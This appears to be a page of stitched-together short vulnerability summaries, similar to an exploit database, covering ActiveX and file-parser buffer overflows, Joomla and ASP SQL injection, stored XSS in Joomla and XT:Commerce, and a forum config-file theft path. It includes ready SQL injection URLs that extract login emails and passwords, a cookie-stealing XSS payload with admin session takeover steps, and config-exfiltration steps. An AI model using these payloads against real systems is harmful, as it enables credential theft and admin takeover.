The CMNC-200 IP Camera ActiveX control identified by CLSID {DD01C8CA-5DA0-4B01-9603-B7194E561D32} is vulnerable to a stack overflow on the first argument of the connect method. The vulnerability can be used to set the EIP register, allowing a reliable exploitation. The example code below triggers the vulnerability.
This vulnerability can be found by viewing the component in the Joomla administrator backend. Examples: administrator/index.php?option=com_jsupport&task=listTicketsα=[SQL Injection] administrator/index.php?option=com_jsupport&task=listFaqsα=[SQL Injection]
The component allows you to create and submit tickets. The tickets can be viewed on the website and in the admin panel. It is possible to inject arbitrary HTML and JS/VBS code into the title field of the ticket. If someone else views the ticket list, the code gets executed in the visitor's browser. This vulnerability is considered as critical since the tickets are also displayed in the administrator backend of Joomla. As soon as a user with extended priviledges views the ticket list in the admin backend, the code gets executed and damage can be caused.
After using the exploit to get the admin account, the user can go to http://lolcathost/wbb/acp/avatar.php?action=readfolder and import acp/lib. Then, they can download a backup from http://lolcathost/wbb/acp/avatar.php?action=backup. After that, they can go to http://lolcathost/wbb/acp/avatar.php?action=view and search for config.inc.php. After they know the name (for example avatar-17.php), they can go to the zip archive and open avatar-17.php to get the config.inc.php in plaintext.
This exploit uses a combination of null bytes and a loop to cause a denial of service in Mozilla Firefox versions 3.6.12 and below. The exploit writes a series of null bytes and then a loop that writes a large number of 'a' characters and then the contents of the body tag. This causes the browser to crash.
Input passed via the 'specific' parameter to newsroom.asp is not properly sanitised before being used in a SQL query. An attacker can exploit this vulnerability to inject arbitrary SQL commands and gain access to sensitive information from the database. Proof of concept: http://server/newsroom.asp?specific=-1%20UNION%20ALL%20SELECT%20null,(select%20top%201%20chr(126)%2bchr(39)%2bcstr(email)%2bchr(39)%2bchr(126)%20from%20(select%20top%201%20*%20from%20(select%20top%201%20*%20from%20tbllogins%20order%20by%201)%20t%20order%20by%201%20desc)t),null,null,null,null,null%20from%20tbllogins and http://server/newsroom.asp?specific=-1%20UNION%20ALL%20SELECT%20null,(select%20top%201%20chr(126)%2bchr(39)%2bcstr(pword)%2bchr(39)%2bchr(126)%20from%20(select%20top%201%20*%20from%20(select%20top%201%20*%20from%20tbllogins%20order%20by%201)%20t%20order%20by%201%20desc)t),null,null,null,null,null%20from%20tbllogins
metinfo3.0 source code disclosure Vulnerability: An attacker can exploit this vulnerability by sending a crafted request to the vulnerable application. XSS Vulnerability: An attacker can exploit this vulnerability by sending a crafted request to the vulnerable application containing malicious JavaScript code.
VbsEdit v 4.7.2.0 is vulnerable to a buffer overflow vulnerability when a maliciously crafted .vbs file is opened. This can be exploited to execute arbitrary code by tricking a user into opening a specially crafted .vbs file.
This exploit is a buffer overflow vulnerability in Visual MP3 Splitter & Joiner 6.1. It is triggered when a specially crafted .wav file is opened in the application. The application crashes when the Play button is pressed.
XT:Commerce is prone to a (permanent) XSS. An attacker needs to create an account, inject javascript into field 'street' (e.g. '><script>alert(document.cookie)</script>) and place an order. When the administrator opens the order in the backend of the shop, the javascript will be executed. By getting the cookie of the admin, the attacker gets the session-id and user-id. If binding session and ip is not enabled, the attacker will be able to take over the admin-session.
Services By CQR